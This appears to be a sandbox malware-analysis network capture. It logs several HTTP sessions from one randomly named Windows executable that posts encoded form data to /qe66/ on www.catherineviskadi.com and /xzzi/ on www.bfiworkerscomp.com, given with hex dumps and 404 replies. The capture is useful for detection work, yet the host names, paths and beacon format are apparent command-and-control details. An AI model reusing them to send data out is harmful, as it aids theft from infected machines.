2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA=">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	217.160.0.106	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:40:52.016189098 CEST	803	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 48 4a 70 45 76 54 57 51 51 59 49 48 76 48 7a 58 38 62 36 5a 43 54 50 64 2f 70 31 59 55 44 37 47 72 6a 68 2b 6d 43 65 31 2b 65 56 Data Ascii: _Z1XhZu=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7HJpEvTWQQYIHvHzX8b6ZCTPd/p1YUD7Grjh+mCe1+eV
Aug 9, 2024 08:40:52.676192045 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 09 Aug 2024 06:40:52 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	217.160.0.106	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:40:54.546749115 CEST	827	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 7a 4e 64 39 78 48 59 30 44 52 45 72 62 68 73 78 4f 35 36 4b 37 32 4b 76 73 43 6e 33 66 6b 6d 39 63 77 6c 62 72 75 35 59 67 78 50 67 3d 3d Data Ascii: _Z1XhZu=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLSzNd9xHY0DRErbhsxO56K72KvsCn3fkm9cwlbru5YgxPg==
Aug 9, 2024 08:40:55.206078053 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 09 Aug 2024 06:40:55 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49722	217.160.0.106	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:40:57.492974997 CEST	1840	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 64 66 65 63 52 6d 31 4c 2f 63 69 63 43 58 69 42 4b 54 73 6f 6a 36 71 31 4f 7a 43 54 4c 63 4e 69 30 57 38 74 4d 63 4e 39 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 62 6e 52 2f 50 48 44 4f 74 52 47 33 36 2b 4a 66 78 4d 4a 6b 6d 4c 35 70 35 31 34 5a 47 4c 74 64 49 56 70 57 5a 7a 72 36 79 63 32 49 67 6c 4c 38 59 41 34 47 4e 74 62 69 73 56 39 36 76 39 30 69 59 78 4f 31 6b 64 72 32 72 54 56 61 70 41 55 [TRUNCATED] Data Ascii: _Z1XhZu=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYdfecRm1L/cicCXiBKTsoj6q1OzCTLcNi0W8tMcN9PS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQbnR/PHDOtRG36+JfxMJkmL5p514ZGLtdIVpWZzr6yc2IglL8YA4GNtbisV96v90iYxO1kdr2rTVapAUxsy9B3VdrD6VcTBDFfkAt2GZsgtf5R28owfTSLTmJIvN3N8fCJsz6BSx/mmLudKeEmJL9bUhgKgC/U2QjAlAGk47n5JkRtM4iBB27JxxTR0ss2Z9Z/gLmpEq62uzjPZiodM2mfcD0eIMjNHDm/7mTSeytafM51E6NukhhL+h4cSQq/HLfF2CKPJLRlJ7nZT1CfOUI8YyycH7ggNLkMR44n720/haawiY2uPdFNb1hhUXJbC6KplHjBlfu6QHpO6741+Pmme6/b7tjOKz157h6q6Mogd44hERl8/KhloEcz8qXnJnY+12oGlx+27vmyxihsp2McqwCgaNGoPPo0m4mhLLVADsgrAWaNA3j+V43Uwij/O6WaKE2Xg8Oh7+CyPAf4uPtdf0Aiq3AOBqo18YZirPUDyjIyu0McboMYFjD0+p1t8hq7uz+30DULYo7xsbn1+DW2XtfUV3mVFNfpMcqmGlHa3WIdG2Fvek16GkZ4vnfOVx7Ccy7Jv8283WW8X7losN81qzfAnFolyaF7T6tM8XTV/K25Z2fPyQHKtNuaHGOZRy0tKZz+TLLyA2fkUOTe7wAIh5oskkFwBC+Cna05LKLFZ45urw29gRjaDmNXKKRr6ipL0wyVxFpbhYvpdXLxNnshIO23OWd/S4e4L4QuRXSq6NQMWO6w [TRUNCATED]
Aug 9, 2024 08:40:58.238182068 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 09 Aug 2024 06:40:58 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49724	217.160.0.106	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:00.030673027 CEST	527	OUT	GET /qe66/?_Z1XhZu=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+wKPhcHxQ8Rf4DwBflmJ1M/5T4ZVijf5rQCTFvH5w/RX8EiUu+U=&f6Gp=VzB4OR5 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.catherineviskadi.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:41:00.698339939 CEST	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Fri, 09 Aug 2024 06:41:00 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49727	208.91.197.27	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:22.450366974 CEST	797	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 59 54 38 46 51 4f 61 4b 45 65 74 59 39 4b 63 42 2b 4f 59 75 4a 2b 49 36 45 64 74 76 4f 52 4b 37 65 46 47 66 5a 61 6b 6c 64 72 75 Data Ascii: _Z1XhZu=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDYT8FQOaKEetY9KcB+OYuJ+I6EdtvORK7eFGfZakldru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49728	208.91.197.27	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:24.983978987 CEST	821	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 65 4b 36 47 46 66 76 75 52 67 35 65 39 47 4e 4f 57 44 71 70 4f 4e 42 61 79 5a 5a 6d 52 47 6b 35 6a 52 55 63 34 77 70 42 64 43 43 77 3d 3d Data Ascii: _Z1XhZu=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78ZeK6GFfvuRg5e9GNOWDqpONBayZZmRGk5jRUc4wpBdCCw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49729	208.91.197.27	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:27.521006107 CEST	1834	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 38 36 50 75 6f 71 59 6a 6d 78 4f 72 4a 34 54 37 38 78 62 4e 5a 69 4d 69 74 4c 75 41 39 53 68 66 58 67 77 6e 71 2f 35 65 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 55 50 43 33 34 4b 61 6b 53 36 4d 63 74 7a 49 61 64 6a 35 4c 57 79 74 6c 4a 44 44 57 41 38 73 71 65 32 48 64 34 54 69 7a 4b 41 51 75 41 45 6e 73 49 6d 56 76 34 74 30 77 49 38 61 45 75 49 30 6f 6c 6c 45 47 37 4c 52 41 49 50 45 48 39 74 32 [TRUNCATED] Data Ascii: _Z1XhZu=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH86PuoqYjmxOrJ4T78xbNZiMitLuA9ShfXgwnq/5e4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9UPC34KakS6MctzIadj5LWytlJDDWA8sqe2Hd4TizKAQuAEnsImVv4t0wI8aEuI0ollEG7LRAIPEH9t2dJz5+2f5xU47l1XU2CXMAR1N9vsWBQ+c3j6qTKWbX8XHXeovHhFbGiskg89VOVwn5YiuqvQEyZTNGcLaVK/oYhorp0XJhVwu0Z7RKMeRW7UYflcdOhEjka1k3QFLmcm8Yvp/aCZcX3qTL7r25wWFUNpUYRjI+SMUvCKD7tTEkT3WCVkZVCf+0RH0rzOMEqofTUmn5lTeEKc63CHB3HDS3ti9oL8drhKa3pzZ35AgKeG+3XQB7Eww8zrKQJeKtBEqPDKHM/XS/xadXL3qc50Te8IXXv0gtwCqHJoh34CXZzJfdwTrrfTNJpLEdYjQc1OizEUxM+OZuher1wB9GVColYXxakIU8XNk2rRhL+NlSu5kk2DCI71P7TYugTW9nscrs3cLg28WLfVOgRh+ZpX4O3N9gxCBABc4IYc5zXa3dyOqyzmiugTAA7Vyrv0S0Z5jvbx4pVDfmsGp4Mwu/znpTwW6JXDLFBeJSc/V6L8SI/Ztyn4BkzUsNHpuQNWbCQf+3RkuS+slxa+3NUt+loDC00V3glio2+YB2W16SFpGL37F9za9tS0EzM7kEts2JK4K5I3ohzqwXlIyxgKbH1w4P+Wur5Vzk3xaD1dxnN/K/bZBhBP74iLDIB9WCsLclTxUOmHmRcArqfHEC+b1iPeF6JAXOwlYaME6Mn [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
